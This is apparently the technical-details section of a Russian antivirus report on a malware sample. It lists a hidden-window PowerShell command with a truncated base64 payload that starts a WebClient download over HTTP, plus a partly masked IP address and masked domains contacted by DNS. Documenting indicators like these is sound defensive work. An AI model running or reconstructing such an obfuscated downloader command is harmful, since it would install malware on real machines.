Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AXwBfADQANQA9ACgAJwByADUAOQA0ACcAKwAnADIAXwAnACkAOwAkAEYAOAAxADIAXwAwADcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQASQBfAF8ANwBfADMANgA9ACgAJwBoAHQAdABwAD...
- '35.#34.5.71':80
- DNS ASK co##ndo.vn
- DNS ASK ed##nta.com
- DNS ASK pi##uji.com
- DNS ASK be######althcareclub.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AXwBfADQANQA9ACgAJwByADUAOQA0ACcAKwAnADIAXwAnACkAOwAkAEYAOAAxADIAXwAwADcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQASQBfAF8ANwBfADMANgA9ACgAJwBoAHQAdABwAD...' (со скрытым окном)